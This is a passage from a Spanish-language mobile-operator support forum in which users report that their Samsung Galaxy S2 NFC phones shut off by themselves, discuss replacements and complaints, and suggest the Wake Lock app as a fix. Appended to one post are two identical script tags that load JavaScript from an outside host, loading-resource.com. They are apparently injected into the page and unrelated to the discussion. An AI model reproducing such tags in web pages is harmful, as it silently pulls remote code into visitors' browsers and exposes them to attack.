Inicio:

Android

Busca en el Foro:
Respuesta
Nuevo usuario
xoxewi
Mensajes publicados: 2
Mensaje privado

Re: Samsung Galaxy S2 NFC [modelo I9100P] se apaga sólo.

Creo que es un fallo de fabrica del movil, a mi me pasaba lo mismo. Solo que llame a vodafone y me lo cambiaron por otro s2 nfc. El nuevo que me envio vodafone no da ni un fallo, se apaga a veces, pero en ocasiones muy contadas, ni me acuerdo de cual fue la ultima vez que se apago. Y espero que siga asi.  Saludos

Share to Facebook Share to Twitter More...
Mensaje 31 de 234 (12.879 Visitas)
Utilice texto sin formato.
Nuevo usuario
vanessa74
Mensajes publicados: 77
Mensaje privado

Pues que suerte, porque a mi me lo cambiaron y este tambien se apaga. Yo no voy a conformarme con que se apague aunque sea poco, quiero uno que este bien, ya que la fidelización no me pondrán a menos tiempo... además no pedimos tanto.

Mensaje 32 de 234 (12.866 Visitas)
Nuevo usuario
halejandre
Mensajes publicados: 3
Mensaje privado

Problemas Galaxy S2 Blanco - Se apaga solo

[ Editado ]

Buenas tardes,

Escribo porqué yo y mi mujer adquirimos hace una semana el modelo S2 de Galaxy con NFC (GT-I9100P). Yo en negro y ella en blanco.

Su móvil falla. Se apaga solo o se apaga la pantalla al menos una vez al día. Solo vuelve a funcionar cuando se abre la tapa trasera y se quita y pone otra vez la batería. Veo que es un caso común, ya que a otros usuarios les pasa lo mismo.

He hablado directamente con Samsung, y les he comentado que es una incidencia general, pero no me lo ha podido reconocer. La solución que me dieron fue hacer un backup y un factory reset, esperar 10 min. y volver a configurarlo. No ha servido de nada.

Total, he ido a la tienda oficial donde lo compramos solicitando un cambio, ya que hace menos de 10 dias que lo tenemos. Les he comentado la situación, que sale en foros oficiales de vodafone y orange, y me han cogido el movil para enviarlo a Samsung para solicitar un cambio por defecto de fabricación. Me han dado un numero de OT el cual es el siguiente: 1xxxxxxxxxx. En dos semanas sabré alguna cosa.

Señores de Vodafone, espero seriedad por su parte para encontrar solución a esta situación.

Saludos cordiales.

Mensaje 33 de 234 (12.860 Visitas)
Nuevo usuario
vanessa74
Mensaje privado

Re: Problemas Galaxy S2 Blanco - Se apaga solo

[ Editado ]

Si Vodafone fuera serio, tendría que recoger todos los móviles que no funcionan  y seguro que tienen que saber el problema que hay y los IMEI y enviarte al momento otro y dejarse de tonterias. Eso si que demostraría que es una gran compañía, así, dejan mucho que desear.

Mensaje 34 de 234 (12.846 Visitas)
Nuevo usuario
albertovk
Mensajes publicados: 18
Mensaje privado

Re: Problemas Galaxy S2 Blanco - Se apaga solo

hola saludos.

Ami me llego el mio el dia 31 de octubre,la verdad que los dos primeros dias de tenerlo no lo mire muy bien por que uan segui usando el viejo telefono que tenia un nokia n97,total cuando ya me decido a meterme al lio y ponerle los contactos y demas cosas para usarlo me encuentro con que se reinicia,(bueno no se reinicia simplemente se apaga y no reacciona,solo si le quito la bateria funciona,lo cual no creo que sea muy recomendable hacerlo 4 veces al dia).

no tengo descargada ningun juego ni aplicacion,no soy mucho de jugar en el movil solo llevo instalado whatsapp.

al principio no me preoucupe por que nada mas fue esa vez pero diariamente se fueron sucediendo apagones varios.

entonces no se que hacer estoy leyendo foros que dicen que aunque lo cambies te dan otro igual,y el servicio tecnico por lo visto no detecta nada de fallos segun leo por ay.

que hacemos señores de vodafone si alguien encuentra respuesta o alguna forma de que no pase eso de los apagones porfabor que lo diga .

un saludo alberto.

Mensaje 35 de 234 (12.843 Visitas)
Nuevo usuario
niconunpalo
Mensajes publicados: 10
Mensaje privado

He estado leyendo todo el tema,porque a mi me pasa el mismo problema desde que a primeros de septiembre me llegara el movil y ahora mismo lo tengo en el sat por segunda vez,la primera me han hecho una actualizacion del software y nada y cuando vuelva a venir ya estoy mentalizado que va a seguir igual,hasta que no me den uno esto no se soluciona,yo voy a ir a consumo a poner una reclamacion y luego llamare a atencion al cliente o reclamare donde sea hasta que se cansen de mi y me lo den nuevo por pesado o lo solucionen.

Mensaje 36 de 234 (12.827 Visitas)
Nuevo usuario
vanessa74
Mensaje privado

Pues yo voy a empezar a moverme para una reclamación. Ya estoy harta de la tomadura de pelo tanto de los señores Vodafone como de los señores Samsung. Saben de sobra que tienen un puñetero problema con este modelo de teléfono y no les da la real gana de arreglarlo. Jo... una solución, sólo pedimos eso!!! esto es un foro oficial, no de pelanas, pero pasan olimpicamente. Si alguien es de la zona de Murcia podemos intentar hacerlo juntos. Un saludo

Mensaje 37 de 234 (12.804 Visitas)
Nuevo usuario
Antonov1964
Mensajes publicados: 8
Mensaje privado

Hay una solución  al tema  bajarse una aplicacion de andrid llamada WAKE LOCK  que evita que el movil entre  en modo suspensión  como los ordenadores  y se apage .

Hay que marcar en wake lock PARTIAL_WAKE_LOCK(CPUon,Screen OFF, Keyboard  off) evita que baje los  mhz a menos 200 y lo  deja entre 200 y 300 cuando este en reposo evitando asi que se apage.

Esta aplicacion es gratuita  y se descarga desde el movil.

Saludos.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
Mensaje 38 de 234 (12.803 Visitas)
Nuevo usuario
vanessa74
Mensaje privado

[ Editado ]

Muchas gracias voy a probarlo!!! en la pantalla aparece a la izquierda un simbolito? Gracias por la ayuda. Sólo he de dar donde pone Partial-Wake_Lock?

Mensaje 39 de 234 (12.796 Visitas)
Nuevo usuario
Antonov1964
Mensajes publicados: 8
Mensaje privado

Solo marcar PARTIAL_WAKE_LOCK

Mensaje 40 de 234 (12.768 Visitas)